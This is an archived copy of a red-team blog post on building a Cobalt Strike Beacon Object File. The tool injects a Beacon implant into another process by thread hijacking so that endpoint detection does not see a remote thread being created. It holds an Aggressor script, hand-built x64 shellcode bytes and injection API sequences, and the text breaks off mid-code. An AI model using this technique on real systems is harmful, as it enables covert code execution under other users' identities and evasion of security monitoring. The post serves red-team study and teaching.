{
	"id": "52178d8e-525c-4fc9-a022-cffb9ec723e7",
	"created_at": "2026-04-10T03:22:03.35565Z",
	"updated_at": "2026-04-10T03:22:19.731704Z",
	"deleted_at": null,
	"sha1_hash": "22a337a7e2a698b3935b38a27b5fe1eeac6b1f7f",
	"title": "Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1229078,
	"plain_text": "Malware Development: Leveraging Beacon Object Files for\r\nRemote Process Injection via Thread Hijacking\r\nBy Connor McGarr\r\nPublished: 2021-01-09 · Archived: 2026-04-10 02:43:13 UTC\r\nIntroduction\r\nAs people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love\r\neverything about it, from the problem-solving aspects to the OS internals, assembly, and C side of the house. I also\r\nenjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for\r\nexploitation, I also love to red team. After all, this is what I do on a day-to-day basis. While I love to work my way\r\naround enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it\r\nincredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals\r\nin order to bypass security products and stay undetected (well, try to, anyway). Since Cobalt Strike, a very popular\r\nremote access tool (RAT), is so widely adopted by red teams, I thought I would dig deeper into a\r\nnewer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities\r\nin C (which makes me incredibly happy as a person). This blog will go over a technique known as thread\r\nhijacking and how to integrate it into a usable Beacon Object File.\r\nHowever, before beginning, I would like to make clear that this post will focus on the technique of remote process\r\ninjection, thread hijacking, and thread restoration, not so much on Beacon Object Files themselves. Beacon\r\nObject Files, for our purposes, are a means to an end, as this technique can be deployed in many other ways. As\r\nmentioned earlier, Cobalt Strike is widely adopted; I think it is a great tool, and I am a big proponent of it. 
I\r\nstill believe, however, that at the end of the day it is more important to understand the overarching concept surrounding\r\na TTP (Tactics, Techniques, and Procedures) than to learn how to arbitrarily run a tool, since relying on the tool itself\r\ncreates a bottleneck in your red teaming methodology. If Cobalt Strike went away\r\ntomorrow, that shouldn’t render this TTP, or any other TTPs, useless. Somewhat contradictorily, however, the first\r\nportion of this post will briefly outline what Beacon Object Files are, give a quick recap of remote process injection,\r\nand cover a bit about writing code that adheres to the needs of Beacon Object Files.\r\nLastly, the final project can be found here.\r\nBeacon Object Files - You have two minutes, go.\r\nBack in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known\r\nas Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are\r\nexecuted as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the\r\nlinking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics,\r\ncapabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you\r\nhttps://connormcgarr.github.io/thread-hijacking/\r\nPage 1 of 37\n\nto check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF\r\ndevelopment.\r\nOne thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be\r\nsubjective, but as Raphael points out in his video and blog, the main benefits of BOFs are twofold:\r\n1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work; they’re directly\r\nexecuted as position-independent code within the current Beacon process, increasing overall OPSEC\r\n(operational security).\r\n2. 
BOFs are really meant to interact with the Windows API and the internal Beacon API, as Beacon exposes a\r\nset of functions to BOFs that operators can use when developing. This means BOFs are smaller in size and easily allow\r\nyou to invoke Windows APIs and interact with the internal Beacon API.\r\nAdditionally, there are a few drawbacks to BOFs:\r\n1. Cobalt Strike is the linker for BOFs, meaning libc-style functions like strlen will not resolve. To\r\ncompensate for this, however, you can use BOF-compliant decorators in your function prototypes with the\r\nMSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such\r\nfunctions with BOFs will be outlined later in this post. Additionally, as Raphael’s CVE-2020-0796 BOF demonstrates, you can define your own C-style functions.\r\n2. BOFs are executed within the current Beacon process, meaning that if your BOF encounters some kind of\r\ninternal error and fails, your Beacon process will crash as well. This means BOFs should be carefully\r\nvetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using the properly documented data types and structures outlined in a\r\nfunction’s prototype, and cleaning up any opened handles, allocated memory, etc.\r\nNow that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking,\r\nand outline our BOF’s execution flow.\r\nRemote process injection, for the unfamiliar, is a technique in which an operator can inject code into another\r\nprocess on a machine, under certain circumstances. 
This is most commonly done by calling a chain of Windows APIs\r\nto allocate some memory in the other process, write user-defined data (usually a\r\nshellcode of some sort) to that allocation, and kick off execution by creating a thread within the remote process.\r\nThe APIs VirtualAllocEx , WriteProcessMemory , and CreateRemoteThread are popular choices for these three steps,\r\nrespectively.\r\nWhy is remote process injection important? Take a look at the image below, which is a process listing\r\nperformed inside of a Cobalt Strike Beacon implant.\r\nAs is seen above, Cobalt Strike discloses to the operator not only what processes are running, but also the\r\nuser context each process is running under. This could be very useful on a penetration test in an Active\r\nDirectory environment where the goal is to obtain domain administrative access. Let’s say you as an operator\r\nobtain access to a server where many users are logged in, including a user with domain administrative\r\naccess. This means there is a good chance that processes are running in the context of this high-value\r\nuser. 
This can be seen below, where a second process listing shows that another user,\r\nANOTHERUSER, has a PowerShell.exe process running on the host.\r\nUsing Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe\r\nprocess with the remote injection technique specified in the Cobalt Strike Malleable C2 profile. The inject command takes the PID of the PowerShell.exe instance, the process\r\narchitecture (64-bit), and the name of the Cobalt Strike listener as arguments, and results in a\r\nsecond callback in the context of the ANOTHERUSER user.\r\nAfter the injection, there is a successful callback, resulting in a valid session in the context of the OTHERUSER user.\r\nThis is useful to a red team operator, as the credentials for OTHERUSER were not needed in order to obtain\r\naccess in the context of that user. However, there are drawbacks, including endpoint detection\r\nand response (EDR) products that detect such behavior. One indicator of compromise (IOC) in this instance would be\r\na remote thread being created in a remote process. There are more IOCs for this TTP, but this blog\r\nwill focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a\r\ntechnique in which an already existing thread within the target process is suspended and manipulated in order to\r\nexecute shellcode.\r\nThread Hijacking and Thread Restoration\r\nAs mentioned earlier, the process for a typical remote injection is:\r\n1. Allocate a memory region within the target process using VirtualAllocEx . A handle to the target process\r\nwith at least the PROCESS_VM_OPERATION access right must already exist in order to use this\r\nAPI successfully. This handle can be obtained using the Windows API function OpenProcess .\r\n2. Write your code to the allocated region using WriteProcessMemory . 
A handle to the target process with at least the PROCESS_VM_WRITE access right and the previously mentioned\r\nPROCESS_VM_OPERATION access right must already exist, meaning a handle to the remote process must have both of these access rights at\r\nminimum to perform remote injection.\r\n3. Create a remote thread within the remote process to execute the shellcode, using CreateRemoteThread .\r\nOur thread hijacking technique will use the first two steps of the previous list, but instead of\r\nCreateRemoteThread , our workflow will consist of the following:\r\n1. Open a handle to the remote process with the aforementioned access rights required by VirtualAllocEx\r\nand WriteProcessMemory .\r\n2. Loop through the threads on the machine using the Windows API CreateToolhelp32Snapshot . This\r\nloop will contain logic to break upon identifying the first thread belonging to the target process.\r\n3. Upon breaking out of the loop, open a handle to the target thread using the Windows API function OpenThread .\r\n4. Call SuspendThread , passing that thread handle as the argument. SuspendThread\r\nrequires that the handle have the THREAD_SUSPEND_RESUME access right.\r\n5. Call GetThreadContext , using the thread handle. This function requires that the handle have the\r\nTHREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU\r\nregisters, processor flags, and other CPU information into a CONTEXT record. Each thread\r\nhas its own stack, CPU registers, etc., so this saved state will later be used to execute our shellcode and to\r\nrestore the thread once execution has completed.\r\n6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory . 
The\r\nshellcode used in this blog will be the default Cobalt Strike payload, which is a reflective DLL.\r\nThis payload will be dynamically generated with an existing, user-specified listener, using a Cobalt\r\nStrike Aggressor Script. Creation of the Aggressor Script is covered later in this blog post.\r\nThe Beacon implant won’t be executed quite yet; for the time being, it will just sit within the target remote process.\r\n7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional\r\nshellcode. When the DllMain function is called to kick off Beacon, the\r\nshellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave\r\nDllMain , depending on the exit method the operator specified in the payload. Because of this, it would not be\r\npossible to restore the hijacked thread: the thread would run the DllMain function until the operator exits\r\nthe Beacon. Due to this, we must create\r\na shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates\r\na local thread within the remote process for the Beacon implant to run in. Essentially, this is one of three\r\ncomponents our “new” full payload will “carry”, so when execution reaches the remote process, the call to\r\nCreateThread , which creates a local thread, will create the thread in the remote process for Beacon to\r\nrun in. This means that the hijacked thread will never actually execute the Beacon implant; instead, it will\r\nexecute a small shellcode, made up of three components, that places the Beacon implant into its own local\r\nthread, along with two other routines that will be described shortly. 
Up until this point, no code has\r\nbeen executed; everything mentioned is just a synopsis of each component’s purpose.\r\n8. The custom CreateThread routine is executed by being called from another routine that will be\r\nwrapped into our final payload: a routine that calls NtContinue . This is the second component\r\nof our custom shellcode. After the CreateThread routine finishes executing, it will return\r\nback into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the\r\nthread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack\r\noccurred. NtContinue will be discussed later in this post, but for now just know that\r\nNtContinue , at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and\r\nsets the calling thread to that context. Again, no code has been executed so far. The only thing that has\r\nchanged is that our large “final payload” has gained another component, NtContinue .\r\n9. The CreateThread routine is prepended with a stack alignment routine, which performs a bitwise AND\r\non the stack pointer to ensure 16-byte alignment. Some function calls fail if the stack is not 16-byte\r\naligned, and this ensures the stack is 16-byte aligned when the shellcode calls the CreateThread routine. malloc is then invoked to create one large buffer that all of these “moving parts” are added\r\nto.\r\n10. Now that there is one contiguous buffer for the final payload, the final payload, consisting of the three routines, is injected into the remote\r\nprocess, again using VirtualAllocEx and\r\nWriteProcessMemory .\r\n11. Lastly, the previously captured CONTEXT record is updated so that its Rip member (a DWORD64), which\r\nrepresents the value of the 64-bit instruction pointer, points to the address of our full payload.\r\n12. 
SetThreadContext is then called, which updates the target thread to point to the final\r\npayload, and ResumeThread is used to kick off our shellcode by resuming the hijacked thread.\r\nBefore moving on, there are two things I would like to call out. The first is the call to CreateThread . At first\r\nglance, this may not seem like a viable alternative to calling CreateRemoteThread directly. The benefit of the thread\r\nhijacking technique is that even though a thread is created, it is not created from a remote process; it is created\r\nlocally. This does two things: it avoids the common API call chain of VirtualAllocEx ,\r\nWriteProcessMemory , and CreateRemoteThread , and it blends in (a bit more) by calling\r\nCreateThread , which is a less scrutinized API call. There are other IOCs that can detect this technique. However, I will\r\nleave that as an exercise to the reader :-).\r\nLet’s move on and start with some code.\r\nVisual Studio + Beacon Object File Intrinsics\r\nFor this project, I will be using Visual Studio and the MSVC compiler, cl.exe . Feel free to use mingw , as it\r\ncan also produce BOFs. Let’s go over a few house rules for BOFs before we begin.\r\nIn order to compile a BOF with Visual Studio, open an x64 Native Tools Command Prompt for VS session and use\r\nthe following command: cl /c /GS- INPUT.c /FoOUTPUT.o . This compiles the C program as an object file\r\nonly (/c) and disables stack cookies (/GS-), since the Cobalt Strike linker cannot resolve the\r\nstack cookie check functions the compiler would otherwise insert.\r\nIf you would like to call a Windows API function, BOFs require the __declspec(dllimport) keyword, which is\r\ndefined in winnt.h as DECLSPEC_IMPORT . 
This indicates to the compiler that the function is found within a\r\nDLL, essentially telling the compiler “this function will be resolved later”. As mentioned before, since Cobalt\r\nStrike is the linker, this is needed to tell the compiler to defer the linking. Since the linking will come\r\nlater, a full function prototype must also be supplied to the BOF. You can use Visual Studio to “peek” at\r\nthe prototype of a Windows API function. Copying that prototype will suffice to attach the __declspec(dllimport) keyword to\r\nour function prototypes, as the prototypes of most Windows API functions begin with a macro such as\r\nWINBASEAPI , which is defined via #define to include the __declspec(dllimport) keyword. An example\r\nwould be the prototype of the function GetProcAddress , as seen below.\r\nThis reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.\r\nArmed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it\r\nwould be declared as such:\r\nWINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);\r\nThe value directly before the $ represents the library the function is found in. The relocation table of the object\r\nfile, which essentially lists the locations in the object file that need addresses filled in, such as functions from\r\nother libraries or object files, will reference the prototyped LIB$Function symbol. Cobalt\r\nStrike, acting as the linker and loader, will parse this table and patch the object file, where\r\napplicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the\r\nabove example. This blob is then passed to Beacon as code to be executed. 
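To make the LIB$Function convention concrete, here is a minimal C sketch of the first thing a loader has to do with such a name: split it at the dollar sign into the library to load and the function to look up. split_bof_symbol is a hypothetical helper written for illustration; it is not Cobalt Strike's loader code. It assumes any compiler-added import prefix has already been removed (with MSVC on x64, dllimport references typically appear in the object file as __imp_KERNEL32$GetProcAddress).

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical sketch: split an import name of the form LIBRARY$Function
 * (for example KERNEL32$GetProcAddress) at the dollar sign.
 * Returns 0 on success, or -1 if there is no separator or an output
 * buffer is too small to hold its part plus a terminating NUL.
 */
int split_bof_symbol(const char *sym, char *lib, size_t lib_size,
                     char *fn, size_t fn_size)
{
    const char *sep = strchr(sym, '$');
    size_t lib_len;
    size_t fn_len;

    if (sep == NULL)
        return -1;

    lib_len = (size_t)(sep - sym);   /* characters before the dollar sign */
    fn_len = strlen(sep + 1);        /* characters after the dollar sign */
    if (lib_len + 1 > lib_size || fn_len + 1 > fn_size)
        return -1;

    memcpy(lib, sym, lib_len);
    lib[lib_len] = 0;                /* terminate the library name */
    memcpy(fn, sep + 1, fn_len + 1); /* copy the function name and its NUL */
    return 0;
}
```

In a real loader, the library part would then be handed to something like LoadLibraryA and the function part to GetProcAddress; that Windows-specific step is left out of this sketch.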
Not reinventing the wheel here,\r\nRaphael outlines all of this in his wonderful video.\r\nIn addition to this, I will hit on one last thing: user-supplied arguments and returning output back to the\r\noperator. Beacon exposes an internal API to BOFs, which is outlined in the beacon.h header file supplied by\r\nCobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, which sends output back\r\nover Beacon. This API accepts an output type, one of the values defined with #define in beacon.h , such as\r\nCALLBACK_OUTPUT and CALLBACK_ERROR , followed by a format string. For instance, updating the operator with a message would be\r\nimplemented as such:\r\nBeaconPrintf(CALLBACK_OUTPUT, \"[+] Hello World!\\n\");\r\nFor accepting user-supplied arguments, you’ll need to add an Aggressor Script to your project. The\r\nfollowing is the script used for this post.\r\n# Setup cThreadHijack\r\nalias cThreadHijack {\r\n # Declare local variables for the Beacon ID and args\r\n local('$bid $listener $pid $payload');\r\n \r\n # Assign the arguments: Beacon ID, PID, listener name\r\n ($bid, $pid, $listener) = @_;\r\n # Verify the number of arguments\r\n if (size(@_) != 3)\r\n {\r\n berror($bid, \"Error! 
Please enter a valid listener and PID\");\r\n return;\r\n }\r\n # Read in the BOF\r\n $handle = openf(script_resource(\"cThreadHijack.o\"));\r\n $data = readb($handle, -1);\r\n closef($handle);\r\n # Verify PID is an integer\r\n if ((!-isnumber $pid) || (int($pid) \u003c= 0))\r\n {\r\n berror($bid, \"Please enter a valid PID!\\n\");\r\n return;\r\n }\r\n # Generate a new payload\r\n $payload = payload_local($bid, $listener, \"x64\", \"thread\");\r\n # Optionally save a copy of the generated payload to out.bin for inspection\r\n $handle1 = openf(\"\u003eout.bin\");\r\n writeb($handle1, $payload);\r\n closef($handle1);\r\n \r\n # Pack the arguments\r\n # 'b' is binary data and 'i' is an integer\r\n $args = bof_pack($bid, \"ib\", $pid, $payload);\r\n # Run the BOF\r\n # go = Entry point of the BOF\r\n beacon_inline_execute($bid, $data, \"go\", $args);\r\n}\r\nThe goal is to be able to supply our BOF, with the very original name cThreadHijack , to Cobalt Strike along with a PID for\r\ninjection and the name of the Cobalt Strike listener. The local statement declares our variables, which\r\ninclude the ID of the Beacon executing the BOF, the listener name, the PID, and the payload, which will be generated\r\nlater. The @_ array holds the arguments in the order they are supplied to the alias, meaning the\r\ncommand to use this BOF would be cThreadHijack PID \"Name of listener\" . Next, error checking is done to\r\ndetermine whether 3 arguments have been supplied (the PID and listener, which the operator enters, plus the Beacon ID, which Cobalt Strike\r\nsupplies without us needing to input anything). After the object file is read in and the PID is\r\nverified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method (thread). After this, the user-supplied argument $pid is packed as an integer\r\nand the newly created $payload variable is packed as binary data. 
Then, upon execution in Cobalt Strike, the\r\nalias cThreadHijack runs the BOF with the aforementioned arguments, using the function go as the main entry\r\npoint. This script must be loaded before executing the BOF.\r\nFrom the C code side, this is how it looks to parse these arguments and define the functions needed for thread\r\nhijacking.\r\nThe function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied\r\narguments. Then, the variable int pid is set to the user-supplied PID, while the char* shellcode variable is set to\r\nthe Beacon implant, meaning everything is in place. Finally, now that the details on adhering to BOF rules while\r\nwriting C are out of the way, let’s get into the code.\r\nOpen, Enumerate, Suspend, Get, Inject, and Get Out!\r\nThe first step in thread hijacking is to open a handle to the target process. As mentioned before, the calls that\r\nuse this handle, VirtualAllocEx and WriteProcessMemory , require it to have both the\r\nPROCESS_VM_OPERATION and PROCESS_VM_WRITE access rights. This corresponds to the following code.\r\nThis function accepts the user-supplied PID and returns a handle to that process. After the process handle is\r\nopened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot . The snapshot is walked\r\nin a loop that “breaks” upon reaching the first thread belonging to the target PID. 
When this happens, OpenThread is called with the access rights THREAD_SUSPEND_RESUME , THREAD_SET_CONTEXT , and THREAD_GET_CONTEXT .\r\nThis allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.\r\nAt this point, the goal is to suspend the identified thread in order to obtain its current CONTEXT record and later\r\nset its context again.\r\nOnce the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not\r\nbe the final payload the hijacked thread executes; this step simply places the Beacon implant into the remote\r\nprocess so that its address can be used later on in the CreateThread routine.\r\nNow that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process\r\naddress space, it is time to build a BYTE array that places the Beacon implant in a thread and executes it.\r\nBeacon - Stay Put!\r\nAs previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread.\r\nCurrently, the implant is just sitting within the desired remote process and has not executed. To do this, we will\r\ncreate a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the\r\nCreateThread function prototype.\r\nHANDLE CreateThread(\r\n LPSECURITY_ATTRIBUTES lpThreadAttributes,\r\n SIZE_T dwStackSize,\r\n LPTHREAD_START_ROUTINE lpStartAddress,\r\n __drv_aliasesMem LPVOID lpParameter,\r\n DWORD dwCreationFlags,\r\n LPDWORD lpThreadId\r\n);\r\nAs the Microsoft documentation states, this function creates a thread to execute within the virtual address\r\nspace of the calling process. 
Since we will be injecting this routine into the remote process, when the routine\r\nexecutes, it will create a thread within the remote process. This is beneficial to us: CreateThread creates a\r\nlocal thread, but since the routine will be executed inside of the remote process, the new thread is local to that process,\r\ninstead of requiring us to create a thread remotely from our current process.\r\nThe parameter we care about is lpStartAddress , of type LPTHREAD_START_ROUTINE , which is really just a function\r\npointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon\r\nimplant. We already have this address, as VirtualAllocEx returns a value of type LPVOID , which is a pointer\r\nto our shellcode. Let’s get into the development of the routine.\r\nThe first step is to declare a 64-byte BYTE array. 64 bytes was chosen because it is a multiple of the size of a QWORD (8 bytes), the size\r\nof a 64-bit address. This ensures proper alignment, meaning the buffer spans exactly 8 QWORDS, which\r\nkeeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter”\r\nto make sure we are placing our opcodes at the correct index within the BYTE array.\r\nBYTE createThread[64] = { 0 };\r\nint z = 0;\r\nSince we are working on a 64-bit system, we must adhere to the Microsoft x64 calling convention, commonly referred to as __fastcall . This calling\r\nconvention requires that the first four integer arguments (floating-point values are passed in different registers) be\r\npassed in the RCX , RDX , R8 , and R9 registers, respectively. However, the question remains: CreateThread\r\nhas a total of six parameters, so what do we do with the last two? With __fastcall , the fifth and subsequent\r\nparameters are located on the stack, starting at an offset of 0x20 from RSP and every 0x8 bytes thereafter. This means, for our\r\npurposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28 . 
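The offset rule can be expressed as a tiny C function. This is a sketch assuming the Microsoft x64 calling convention, in which the caller also reserves 0x20 bytes of home (shadow) space for the four register arguments; that reserved space is why the fifth argument starts at RSP + 0x20. stack_arg_offset is a hypothetical helper that only illustrates the arithmetic, with offsets measured from RSP just before the call instruction.

```c
/* Bytes of home (shadow) space the caller reserves for RCX, RDX, R8 and R9. */
#define HOME_SPACE 0x20
/* Every stack argument occupies one 8-byte QWORD slot. */
#define STACK_SLOT 0x8

/*
 * Hypothetical helper: offset from RSP, just before the call instruction,
 * of the n-th (1-based) integer argument, or -1 if that argument is passed
 * in a register (arguments 1 through 4 go in RCX, RDX, R8 and R9).
 */
long stack_arg_offset(int n)
{
    if (n <= 4)
        return -1; /* passed in a register, not read from a stack slot */
    return HOME_SPACE + (long)(n - 5) * STACK_SLOT;
}
```

For CreateThread, stack_arg_offset(5) evaluates to 0x20 (dwCreationFlags) and stack_arg_offset(6) to 0x28 (lpThreadId), matching the offsets above.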
Here\r\nare the parameters used for our purposes.\r\n1. lpThreadAttributes will be set to NULL . Setting this value to NULL ensures the thread handle isn’t\r\ninherited by child processes.\r\n2. dwStackSize will be set to 0. Setting this parameter to 0 makes the thread use the default stack size\r\nfor the executable, which is fine for our purposes.\r\n3. lpStartAddress , as previously mentioned, will be the address of our shellcode. This parameter is a\r\nfunction pointer to be executed by the thread.\r\n4. lpParameter will be set to NULL , as our thread does not need any argument passed to it.\r\n5. dwCreationFlags will be set to 0, which indicates that the thread should run immediately\r\nafter it is created. This will kick off our Beacon implant after thread creation.\r\n6. lpThreadId will be set to NULL , as we do not need the thread ID returned through\r\nthis LPDWORD pointer parameter. We could have passed a legitimate pointer to a DWORD and it\r\nwould have been filled with the thread ID. However, this is not important for the purpose of this\r\npost.\r\nThe first step is to place a value of NULL , or 0, into the RCX register for the lpThreadAttributes argument. To\r\ndo this, we can use bitwise XOR.\r\n// xor rcx, rcx\r\ncreateThread[z++] = 0x48;\r\ncreateThread[z++] = 0x31;\r\ncreateThread[z++] = 0xc9;\r\nThis XORs RCX with itself and stores the result in RCX. Since any value XORed with itself is 0, RCX is left holding 0. 
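The three opcode bytes are not arbitrary. Here is a hedged C sketch, based on standard x86-64 encoding rules, that derives them: a REX.W prefix (0x48) selects 64-bit operands, 0x31 is XOR r/m64, r64, and a ModRM byte with mod = 11 names the same register as both operands. For R8 through R15, the REX.R and REX.B bits are also set. encode_xor_self and its 0-15 register numbering are assumptions made for this example.

```c
#include <stdint.h>

/*
 * Hypothetical helper: encodes xor reg, reg for a 64-bit general-purpose
 * register numbered 0-15 (0 = RAX, 1 = RCX, 2 = RDX, ..., 8 = R8, 9 = R9).
 * Writes three bytes into out and returns the number of bytes written.
 */
int encode_xor_self(uint8_t *out, int reg)
{
    uint8_t low = (uint8_t)(reg & 7);  /* register bits that fit in ModRM */
    uint8_t rex = 0x48;                /* REX.W: 64-bit operand size */

    if (reg >= 8)
        rex |= 0x04 | 0x01;            /* REX.R and REX.B extend reg and rm */
    out[0] = rex;
    out[1] = 0x31;                     /* XOR r/m64, r64 */
    out[2] = (uint8_t)(0xC0 | (low << 3) | low); /* mod = 11: register-direct */
    return 3;
}
```

With register numbers 1, 2 and 9 it yields 48 31 c9 (RCX), 48 31 d2 (RDX) and 4d 31 c9 (R9), the same bytes this post writes by hand.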
Similarly, we can leverage the same\r\nproperty of XOR for the second parameter, dwStackSize , which is also 0.\r\n// xor rdx, rdx\r\ncreateThread[z++] = 0x48;\r\ncreateThread[z++] = 0x31;\r\ncreateThread[z++] = 0xd2;\r\nThe next parameter, lpStartAddress , is really the only one we need to supply a non-zero value for.\r\nBefore supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon\r\nimplant into the desired remote process.\r\nThe above code returns the virtual memory address of our allocation into the variable placeRemotely . As can be\r\nseen, this return value is of the data type LPVOID , while the lpStartAddress parameter takes a data type of\r\nLPTHREAD_START_ROUTINE , which is likewise just a pointer. However, for clarity’s sake, we will first type\r\ncast this address to an LPTHREAD_START_ROUTINE function pointer.\r\n// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer\r\nLPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;\r\nIn order to place this value into the BYTE array, we need a function that can copy this 8-byte address into the\r\nbuffer, as each element of the BYTE array holds only one byte. There is a limitation, however: BOFs do not link\r\nC runtime functions such as memcpy . We can overcome this by creating our own custom memcpy routine, or by\r\ngrabbing one from the MSVCRT library, which Cobalt Strike can link for us. 
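As a rough illustration of the first option, a CRT-free copy routine can be as simple as a byte loop. bof_copy is a hypothetical name and is not the mycopy function from Raphael's header; it only shows the idea. One caveat worth checking, stated as an assumption rather than a guarantee: an optimizing compiler may recognize a loop like this and replace it with a call to memcpy, which would reintroduce the unresolved import, so inspect the object file's symbols after compiling.

```c
#include <stddef.h>

/*
 * Hypothetical CRT-free copy: copies len bytes from src to dst one byte
 * at a time and returns dst, mirroring memcpy. The regions must not overlap.
 */
void *bof_copy(void *dst, const void *src, size_t len)
{
    unsigned char *d = (unsigned char *)dst;
    const unsigned char *s = (const unsigned char *)src;

    while (len--)
        *d++ = *s++;
    return dst;
}
```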
However, for now, and for the awareness\r\nof others, we will leverage a libc.h header file that Raphael created, which can be found here.\r\nUsing the custom mycopy function, we can now emit a mov r8, LPTHREAD_START_ROUTINE instruction, which loads our start address into R8 as the third argument.\r\n// mov r8, LPTHREAD_START_ROUTINE\r\ncreateThread[z++] = 0x49;\r\ncreateThread[z++] = 0xb8;\r\nmycopy(createThread + z, \u0026threadCast, sizeof(threadCast));\r\nz += sizeof(threadCast);\r\nNotice how the end of this small shellcode blob updates the array index counter z , to ensure the\r\nnext bytes are written at the correct index. We have the luxury of using mov r8, LPTHREAD_START_ROUTINE , as our\r\nshellcode has already been mapped into the remote process. This allows the CreateThread routine to\r\nfind this function pointer in memory, since it is valid within the remote process address space. We must\r\nremember that each process on Windows has its own private virtual address space, meaning memory in one user\r\nmode process isn’t directly visible to another user mode process. As we will see with the NtContinue stub coming up, we\r\nwill actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the\r\nstructure is located in the current process, while the code will be executing within the desired remote process.\r\nNow that the lpStartAddress parameter has been completed, lpParameter must be set to NULL . Again, this\r\ncan be done using bitwise XOR.\r\n// xor r9, r9\r\ncreateThread[z++] = 0x4d;\r\ncreateThread[z++] = 0x31;\r\ncreateThread[z++] = 0xc9;\r\nThe last two parameters, dwCreationFlags and lpThreadId , will be located at offsets of 0x20 and 0x28 ,\r\nrespectively, from RSP. 
Since R9 already contains a value of 0, and since both parameters need a value of 0, we\r\ncan use two mov instructions, as follows.\r\n// mov [rsp+20h], r9 (which already contains 0)\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x89;\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x24;\r\ncreateThread[z++] = 0x20;\r\n// mov [rsp+28h], r9 (which already contains 0)\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x89;\r\ncreateThread[z++] = 0x4c;\r\ncreateThread[z++] = 0x24;\r\ncreateThread[z++] = 0x28;\r\nA quick note - the brackets surrounding each [rsp+OFFSET] operand indicate that we are writing to the memory\r\nRSP+OFFSET points to, not to RSP itself.\r\nThe next goal is to resolve the address of CreateThread. Even though we will be resolving this address within\r\nthe BOF, meaning it will be resolved within the current process, not the desired remote process, the address of\r\nCreateThread will be the same across processes: although each user mode process is mapped its own view of\r\nkernel32.dll, that DLL is loaded at the same base address in every process (ASLR only re-randomizes system DLL bases at boot). To resolve this address, we will use the following routine, with BOF denotations in our code.\r\n// Resolve the address of CreateThread\r\nunsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA(\"kernel32\"), \"CreateT\r\n// Error handling\r\nif (createthreadAddress == NULL)\r\n{\r\n BeaconPrintf(CALLBACK_ERROR, \"Error! Unable to resolve CreateThread. Error: 0x%lx\\n\", KERNEL32$GetLastError())\r\n}\r\nThe unsigned long long variable createthreadAddress will be filled with the address of CreateThread.\r\nunsigned long long is a 64-bit type, which matches the size of a memory address on a 64-bit system. Although\r\nKERNEL32$GetProcAddress is prototyped to return a FARPROC, we need the address to actually be of\r\nthe type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine\r\nwith mycopy.
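The 0x49 0xb8 bytes used for mov r8 earlier, and the 0x48 0xb8 bytes used for mov rax next, follow the standard encoding of mov r64, imm64: a REX prefix with REX.W set (plus REX.B for R8 through R15), the opcode 0xB8 plus the low three bits of the register number, and then the 8-byte immediate in little-endian order. The following sketch (emit_mov_imm64 is a hypothetical name) writes the immediate with shifts instead of mycopy, which yields the same bytes on little-endian x86.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

// Hypothetical helper: writes the 10-byte encoding of mov reg, imm64 into buf
// and returns the number of bytes written.
// reg is the register number: 0 = RAX ... 7 = RDI, 8 = R8 ... 15 = R15.
size_t emit_mov_imm64(uint8_t *buf, unsigned reg, uint64_t imm)
{
    assert(reg < 16);
    size_t n = 0;

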